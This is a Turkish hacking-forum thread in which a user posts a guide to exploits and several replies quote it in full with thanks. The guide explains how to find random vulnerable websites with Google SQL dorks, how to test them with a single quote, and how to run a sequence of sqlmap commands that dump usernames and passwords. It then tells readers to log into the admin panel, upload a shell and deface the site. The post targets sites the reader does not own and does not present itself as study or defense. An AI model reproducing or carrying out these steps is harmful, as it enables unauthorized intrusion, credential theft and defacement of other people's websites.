Exploit nedir? Nasıl kullanılır?

highfly

Katılımcı Üye
11 Nis 2021
410
3
306
gugava nzı HashlendiÇzünBklm
herkese merhaba arkadaşlar ben HighFly şimdi işleyeceğimiz konuları görelim
1-EXPLOİT NEDİR?
2-EXPLOİT TÜRLERİ NELERDİR?
3-EXPLOİT NASIL KULLANILIR?
4-EXPLOİT AÇIKLARI NASIL KAPATILIR?



1-EXPLOİT NEDİR?
EXPLOİT sistemde keşfedilmiş kod hatalarından, sistem açığından sistemde hata oluşturulabilmesi için geliştirilen bir yazılımlardır. Sisteme giriş yapmak, sisteme zarar veren yazılımlar oluşturmak, ve yetkili kullanıcı oluşturulup sisteme sızmaya sağlayan program, kodlamalar ve yazılımlardır.
exploitler 3 ana kategoriye ayrılırlar bunlar;

  1. Local (yerel) exploitler
  2. Remote (uzak) exploitler​
  3. Clent side exploitler​
Local (yerel) exploitler sistemdeki yetkili kullanıcı özelliklerini kullanmak için tasarlanır.
Remote (uzak) exploitler dijital ağ üzerinden sistemle etkileşimde bulunur.
Clent side exploitler network üzerinden sistemle etkileşimde bulunurlar.


2-EXPLOİT TÜRLERİ NELERDİR
Command Execution Exploits: bu exploit türünün çalıştırılması için sisteme kod yerleştirilmesi gerekir kişi bu exploit türü sayesinde sistemde tam yetkili olabilir. (tehlikeli bir exploit türüdür).

Dos Exploit: sistemi yavaşlatma ve kullanılmaz hale getirmek için kullanılır birçok hacker tarafından bilinen bir exploit türüdür ve ilk geliştirilen exploit türüdür bu tür birden fazla kişi tarafından yapıldığında daha etkili olur ve ayrıca adı ddos olarak değişir

SQL Injection Exploits: neredeyse tüm hackerların zamanında kullandığı bir exploit türüdür bu exploit türü sitedeki açıkların database ini çeker ve siteye sızmamızı sağlar.

(dos exploit ve sql injection exploit tercihimdir)



3-EXPLOİT NASIL KULLANILIR?
Birçok exploit türü olduğundan bunu anlatmam çok üzün sürer ben bu yüzden sql injection exploit türünü anlatacağım ve bu tür aralarında kullanılması en kolay olanlarındandır.
şimdi nasıl kullanılacağına geçelim ilk olarak sitede google' a sql dorkları yazarak birkaç dork aratmamız lazım siz bu dorklardan birini kopyalayıp arama motorunda aratın ve şimdi çıkan sitelerde sql açığı olup olmadığını anlayalım bunun için url'nin sonuna ( ' ) tek tırnak işareti koyalım eğer hata verir ise sitede açık vardın şimdi gelelim

1. kod

sqlmap -u "sitenin url'si" --dbs

bu kod bizim karşımıza sitenin database'ini çıkaracak örnek: vkvideo bu bize 2. kodda lazım olacak şimdi gelelim 2. koda
2.kod


sqlmap -u "sitenin url'si" -D vkvideo --tables

bu kod bize sitenin tables bilgilerini verecektir eğer users, admin gibi bilgiler çıkarsa bunlardan birini çekin yoksa şansızsınız yeni bir site bulun bize users çıktı diyelim
3.kod

sqlmap -u "sitenin url'si" -D vkvideo -T users --columns

bu kod bize columns bilgilerini verecektir (örnek: password, credicard, uname) bunu gibi bilgiler çıkabilir ve bu bilgiler çok önemlidir ama bize burada lazım olan uname ve password
4.kod ve son kod

sqlmap -u "sitenin url'si" -D vkvideo -T users -C uname,password --dump

bu kod bize siteye giriş yapmamıza sağlayan bilgileri verir ve bu kadar bundan sonra sitenin admin panelini bulup şifre kısmına şifreyi kullanıcı kısmına uname bilgilerini girin ve sonra siteye shell basıp index atabilirsiniz.




4-EXPLOİT AÇIKLARI NASIL KAPATILIR?
Exploitler ile doğan sistem zafiyetleri Exploiting hedef aldığı üretici işletim sistemi veya program sahibince kodda yapılan düzenlemeler ve bu düzenlemeler sonrası yayımlanan sistem yamaları ile kapanır. Bu yüzden kullandığımız sistem veya programları güncel tutmak güvenlik açısından önemlidir.

BU GÜNLÜK BU KADAR İYİ GÜNELR İYİ FORUMLAR VE İYİ HACKLER DİLERİM BAŞKA BİR FORUMDA GÖRÜŞMEK ÜZERE:)
umarım işinize yaramıştır yapımcı: HighFly

l4rpvjc.png

gBPwFuWw_o.png
 
Son düzenleme:

UZAY 52

Uzman üye
14 Ağu 2021
1,298
10
833
Ddos
herkese merhaba arkadaşlar ben HighFly şimdi işleyeceğimiz konuları görelim
1-EXPLOİT NEDİR?
2-EXPLOİT TÜRLERİ NELERDİR?
3-EXPLOİT NASIL KULLANILIR?
4-EXPLOİT AÇIKLARI NASIL KAPATILIR?



1-EXPLOİT NEDİR?
EXPLOİT sistemde keşfedilmiş kod hatalarından, sistem açığından sistemde hata oluşturulabilmesi için geliştirilen bir yazılımlardır. Sisteme giriş yapmak, sisteme zarar veren yazılımlar oluşturmak, ve yetkili kullanıcı oluşturulup sisteme sızmaya sağlayan program, kodlamalar ve yazılımlardır.
exploitler 3 ana kategoriye ayrılırlar bunlar;

  1. Local (yerel) exploitler
  2. Remote (uzak) exploitler​
  3. Clent side exploitler​
Local (yerel) exploitler sistemdeki yetkili kullanıcı özelliklerini kullanmak için tasarlanır.
Remote (uzak) exploitler dijital ağ üzerinden sistemle etkileşimde bulunur.
Clent side exploitler network üzerinden sistemle etkileşimde bulunurlar.


2-EXPLOİT TÜRLERİ NELERDİR
Command Execution Exploits: bu exploit türünün çalıştırılması için sisteme kod yerleştirilmesi gerekir kişi bu exploit türü sayesinde sistemde tam yetkili olabilir. (tehlikeli bir exploit türüdür).

Dos Exploit: sistemi yavaşlatma ve kullanılmaz hale getirmek için kullanılır birçok hacker tarafından bilinen bir exploit türüdür ve ilk geliştirilen exploit türüdür bu tür birden fazla kişi tarafından yapıldığında daha etkili olur ve ayrıca adı ddos olarak değişir

SQL Injection Exploits: neredeyse tüm hackerların zamanında kullandığı bir exploit türüdür bu exploit türü sitedeki açıkların database ini çeker ve siteye sızmamızı sağlar.

(dos exploit ve sql injection exploit tercihimdir)



3-EXPLOİT NASIL KULLANILIR?
Birçok exploit türü olduğundan bunu anlatmam çok üzün sürer ben bu yüzden sql injection exploit türünü anlatacağım ve bu tür aralarında kullanılması en kolay olanlarındandır.
şimdi nasıl kullanılacağına geçelim ilk olarak sitede google' a sql dorkları yazarak birkaç dork aratmamız lazım siz bu dorklardan birini kopyalayıp arama motorunda aratın ve şimdi çıkan sitelerde sql açığı olup olmadığını anlayalım bunun için url'nin sonuna ( ' ) tek tırnak işareti koyalım eğer hata verir ise sitede açık vardın şimdi gelelim

1. kod

sqlmap -u "sitenin url'si" --dbs

bu kod bizim karşımıza sitenin database'ini çıkaracak örnek: vkvideo bu bize 2. kodda lazım olacak şimdi gelelim 2. koda
2.kod


sqlmap -u "sitenin url'si" -D vkvideo --tables

bu kod bize sitenin tables bilgilerini verecektir eğer users, admin gibi bilgiler çıkarsa bunlardan birini çekin yoksa şansızsınız yeni bir site bulun bize users çıktı diyelim
3.kod

sqlmap -u "sitenin url'si" -D vkvideo -T users --columns

bu kod bize columns bilgilerini verecektir (örnek: password, credicard, uname) bunu gibi bilgiler çıkabilir ve bu bilgiler çok önemlidir ama bize burada lazım olan uname ve password
4.kod ve son kod

sqlmap -u "sitenin url'si" -D vkvideo -T users -C uname,password --dump

bu kod bize siteye giriş yapmamıza sağlayan bilgileri verir ve bu kadar bundan sonra sitenin admin panelini bulup şifre kısmına şifreyi kullanıcı kısmına uname bilgilerini girin ve sonra siteye shell basıp index atabilirsiniz.

BU GÜNLÜK BU KADAR İYİ GÜNELR İYİ FORUMLAR VE İYİ HACKLER DİLERİMBAŞKA BİR FORUMDA GÖRÜŞMEK ÜZERE:)
umarım işinize yaramıştır yapımcı: HighFly
Eline emeğine sağlık
 

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,933
21
1,815
31
MyKrallife
herkese merhaba arkadaşlar ben HighFly şimdi işleyeceğimiz konuları görelim
1-EXPLOİT NEDİR?
2-EXPLOİT TÜRLERİ NELERDİR?
3-EXPLOİT NASIL KULLANILIR?
4-EXPLOİT AÇIKLARI NASIL KAPATILIR?



1-EXPLOİT NEDİR?
EXPLOİT sistemde keşfedilmiş kod hatalarından, sistem açığından sistemde hata oluşturulabilmesi için geliştirilen bir yazılımlardır. Sisteme giriş yapmak, sisteme zarar veren yazılımlar oluşturmak, ve yetkili kullanıcı oluşturulup sisteme sızmaya sağlayan program, kodlamalar ve yazılımlardır.
exploitler 3 ana kategoriye ayrılırlar bunlar;

  1. Local (yerel) exploitler
  2. Remote (uzak) exploitler​
  3. Clent side exploitler​
Local (yerel) exploitler sistemdeki yetkili kullanıcı özelliklerini kullanmak için tasarlanır.
Remote (uzak) exploitler dijital ağ üzerinden sistemle etkileşimde bulunur.
Clent side exploitler network üzerinden sistemle etkileşimde bulunurlar.


2-EXPLOİT TÜRLERİ NELERDİR
Command Execution Exploits: bu exploit türünün çalıştırılması için sisteme kod yerleştirilmesi gerekir kişi bu exploit türü sayesinde sistemde tam yetkili olabilir. (tehlikeli bir exploit türüdür).

Dos Exploit: sistemi yavaşlatma ve kullanılmaz hale getirmek için kullanılır birçok hacker tarafından bilinen bir exploit türüdür ve ilk geliştirilen exploit türüdür bu tür birden fazla kişi tarafından yapıldığında daha etkili olur ve ayrıca adı ddos olarak değişir

SQL Injection Exploits: neredeyse tüm hackerların zamanında kullandığı bir exploit türüdür bu exploit türü sitedeki açıkların database ini çeker ve siteye sızmamızı sağlar.

(dos exploit ve sql injection exploit tercihimdir)



3-EXPLOİT NASIL KULLANILIR?
Birçok exploit türü olduğundan bunu anlatmam çok üzün sürer ben bu yüzden sql injection exploit türünü anlatacağım ve bu tür aralarında kullanılması en kolay olanlarındandır.
şimdi nasıl kullanılacağına geçelim ilk olarak sitede google' a sql dorkları yazarak birkaç dork aratmamız lazım siz bu dorklardan birini kopyalayıp arama motorunda aratın ve şimdi çıkan sitelerde sql açığı olup olmadığını anlayalım bunun için url'nin sonuna ( ' ) tek tırnak işareti koyalım eğer hata verir ise sitede açık vardın şimdi gelelim

1. kod

sqlmap -u "sitenin url'si" --dbs

bu kod bizim karşımıza sitenin database'ini çıkaracak örnek: vkvideo bu bize 2. kodda lazım olacak şimdi gelelim 2. koda
2.kod


sqlmap -u "sitenin url'si" -D vkvideo --tables

bu kod bize sitenin tables bilgilerini verecektir eğer users, admin gibi bilgiler çıkarsa bunlardan birini çekin yoksa şansızsınız yeni bir site bulun bize users çıktı diyelim
3.kod

sqlmap -u "sitenin url'si" -D vkvideo -T users --columns

bu kod bize columns bilgilerini verecektir (örnek: password, credicard, uname) bunu gibi bilgiler çıkabilir ve bu bilgiler çok önemlidir ama bize burada lazım olan uname ve password
4.kod ve son kod

sqlmap -u "sitenin url'si" -D vkvideo -T users -C uname,password --dump

bu kod bize siteye giriş yapmamıza sağlayan bilgileri verir ve bu kadar bundan sonra sitenin admin panelini bulup şifre kısmına şifreyi kullanıcı kısmına uname bilgilerini girin ve sonra siteye shell basıp index atabilirsiniz.

BU GÜNLÜK BU KADAR İYİ GÜNELR İYİ FORUMLAR VE İYİ HACKLER DİLERİMBAŞKA BİR FORUMDA GÖRÜŞMEK ÜZERE:)
umarım işinize yaramıştır yapımcı: HighFly
Eline sağlık
 

Mertoktay5

Üye
5 Ara 2021
227
95
herkese merhaba arkadaşlar ben HighFly şimdi işleyeceğimiz konuları görelim
1-EXPLOİT NEDİR?
2-EXPLOİT TÜRLERİ NELERDİR?
3-EXPLOİT NASIL KULLANILIR?
4-EXPLOİT AÇIKLARI NASIL KAPATILIR?



1-EXPLOİT NEDİR?
EXPLOİT sistemde keşfedilmiş kod hatalarından, sistem açığından sistemde hata oluşturulabilmesi için geliştirilen bir yazılımlardır. Sisteme giriş yapmak, sisteme zarar veren yazılımlar oluşturmak, ve yetkili kullanıcı oluşturulup sisteme sızmaya sağlayan program, kodlamalar ve yazılımlardır.
exploitler 3 ana kategoriye ayrılırlar bunlar;

  1. Local (yerel) exploitler
  2. Remote (uzak) exploitler​
  3. Clent side exploitler​
Local (yerel) exploitler sistemdeki yetkili kullanıcı özelliklerini kullanmak için tasarlanır.
Remote (uzak) exploitler dijital ağ üzerinden sistemle etkileşimde bulunur.
Clent side exploitler network üzerinden sistemle etkileşimde bulunurlar.


2-EXPLOİT TÜRLERİ NELERDİR
Command Execution Exploits: bu exploit türünün çalıştırılması için sisteme kod yerleştirilmesi gerekir kişi bu exploit türü sayesinde sistemde tam yetkili olabilir. (tehlikeli bir exploit türüdür).

Dos Exploit: sistemi yavaşlatma ve kullanılmaz hale getirmek için kullanılır birçok hacker tarafından bilinen bir exploit türüdür ve ilk geliştirilen exploit türüdür bu tür birden fazla kişi tarafından yapıldığında daha etkili olur ve ayrıca adı ddos olarak değişir

SQL Injection Exploits: neredeyse tüm hackerların zamanında kullandığı bir exploit türüdür bu exploit türü sitedeki açıkların database ini çeker ve siteye sızmamızı sağlar.

(dos exploit ve sql injection exploit tercihimdir)



3-EXPLOİT NASIL KULLANILIR?
Birçok exploit türü olduğundan bunu anlatmam çok üzün sürer ben bu yüzden sql injection exploit türünü anlatacağım ve bu tür aralarında kullanılması en kolay olanlarındandır.
şimdi nasıl kullanılacağına geçelim ilk olarak sitede google' a sql dorkları yazarak birkaç dork aratmamız lazım siz bu dorklardan birini kopyalayıp arama motorunda aratın ve şimdi çıkan sitelerde sql açığı olup olmadığını anlayalım bunun için url'nin sonuna ( ' ) tek tırnak işareti koyalım eğer hata verir ise sitede açık vardın şimdi gelelim

1. kod

sqlmap -u "sitenin url'si" --dbs

bu kod bizim karşımıza sitenin database'ini çıkaracak örnek: vkvideo bu bize 2. kodda lazım olacak şimdi gelelim 2. koda
2.kod


sqlmap -u "sitenin url'si" -D vkvideo --tables

bu kod bize sitenin tables bilgilerini verecektir eğer users, admin gibi bilgiler çıkarsa bunlardan birini çekin yoksa şansızsınız yeni bir site bulun bize users çıktı diyelim
3.kod

sqlmap -u "sitenin url'si" -D vkvideo -T users --columns

bu kod bize columns bilgilerini verecektir (örnek: password, credicard, uname) bunu gibi bilgiler çıkabilir ve bu bilgiler çok önemlidir ama bize burada lazım olan uname ve password
4.kod ve son kod

sqlmap -u "sitenin url'si" -D vkvideo -T users -C uname,password --dump

bu kod bize siteye giriş yapmamıza sağlayan bilgileri verir ve bu kadar bundan sonra sitenin admin panelini bulup şifre kısmına şifreyi kullanıcı kısmına uname bilgilerini girin ve sonra siteye shell basıp index atabilirsiniz.




4-EXPLOİT AÇIKLARI NASIL KAPATILIR?
Exploitler ile doğan sistem zafiyetleri Exploiting hedef aldığı üretici işletim sistemi veya program sahibince kodda yapılan düzenlemeler ve bu düzenlemeler sonrası yayımlanan sistem yamaları ile kapanır. Bu yüzden kullandığımız sistem veya programları güncel tutmak güvenlik açısından önemlidir.

BU GÜNLÜK BU KADAR İYİ GÜNELR İYİ FORUMLAR VE İYİ HACKLER DİLERİM BAŞKA BİR FORUMDA GÖRÜŞMEK ÜZERE:)
umarım işinize yaramıştır yapımcı: HighFly

l4rpvjc.png

gBPwFuWw_o.png
Ellerine saglik
 

0nka

Üye
14 Mar 2022
100
2
55
exploit alanıyla ilgilenen bug research biri olarak güzel makale ellerine sağlık ve bu konuda daha fazla makale gelirse sevinirim :D :D :D
 

highfly

Katılımcı Üye
11 Nis 2021
410
3
306
gugava nzı HashlendiÇzünBklm
Eline emeğine sağlık
teşekkürler hocam:D
eyw hocam teşekkürler:D
teşekkürler
Emeğine sağlık.
teşekkürler(y)
teşekkürler hocam(y)
Güzel Ve Açıklayıcı Olmuş Elinize Sağlık
teşekkürler:)
teşekkür ederim:)
exploit alanıyla ilgilenen bug research biri olarak güzel makale ellerine sağlık ve bu konuda daha fazla makale gelirse sevinirim :D :D :D
tabi ki elimden geldiğince eğitici ve öğretici konular açmaya çalışacağım(y):)
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.